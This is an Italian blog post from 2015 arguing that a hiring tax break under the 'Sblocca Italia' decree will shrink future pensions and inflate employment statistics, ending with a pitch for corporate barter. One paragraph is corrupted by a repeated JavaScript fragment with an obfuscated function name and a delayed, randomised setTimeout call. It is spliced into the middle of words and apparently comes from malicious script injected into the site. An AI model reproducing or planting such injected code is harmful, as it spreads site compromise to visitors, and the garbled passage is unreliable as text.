Da non perdere!

Disoccupazione in calo, ma a che prezzo?

Pubblicato il 1 dicembre 2015
Condividi

Pensioni e risparmio per i giovaniL’attuale Esecutivo, all’interno del cosiddetto “Decreto Sblocca Italia”, prevede il, se così possiamo chiamarlo, “risparmio” dell’imposizione fiscale sul lavoro per i primi tre anni per ciascun nuovo assunto a tempo indeterminato.

Si potrebbe pensare che, superficialmente, la classe degli imprenditori abbia esclamato all’unisono in coro: “Hallelujah!”. Gli attori del mercato più superficiali e meno disincantati hanno gridato al miracolo. Gli economisti più scafati e gli uomini d’impresa altrettanto accorti invece, vedono in provvedimenti del genere la sconfitta, o meglio, l’assenza di una politica di ripresa economica adeguata. E’ chiaro che chiunque produca desideri non tanto pagare meno tasse, quanto perlopiù venire rassicurato circa prospettive di medio e lungo periodo in termini di lavoro in arrivo per la propria azienda, a suon di preventivi accettati e copie commissione debitamente firmate.

Il risparmio sui contributi farà sì che chi è nato nel 1980, dunque avrà 70 anni nel 2050, non solo dovrà lavorare fino ai 75 se in possesso di regolare contratto di occupazione a tempo indeterminato. Con l’aggravio del fatto che, a parità di anni di servizio, rispetto a un 75enne di oggi, vedrà ridursi una pensione di 2.100 € al mese a un importo pari a 1.600 €!

E questo in virtù di che cosa? Di provvedimenti folli che, se da un lato sbandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andierano tanto per far massa e cassa, dati assolutamente propagandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andistici e infondati, quale l’aumento dell’occupazione propriamente intesa, dall’altro non tengono conto che tali dati sono viziati dall’aumento degli inattivi. La parola “esodati di forneriana memoria” vi ricorda qualcosa?

L’unica prospettiva valida è quella di attivarsi fin da subito per far fiorire il proprio business e i propri servizi e studiare piani di risparmio integrativi, in collaborazione con onesti professionisti del settore.

Per quanto riguarda la produttività, la soluzione più immediata è sicuramente quella del corporate barter, il vero sistema per risparmiare preziosa liquidità ed incrementare sensibilmente i ricavi.

Un commento

  1. Pingback: Torna a crescere l’occupazione in Europa - VisioBlog

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *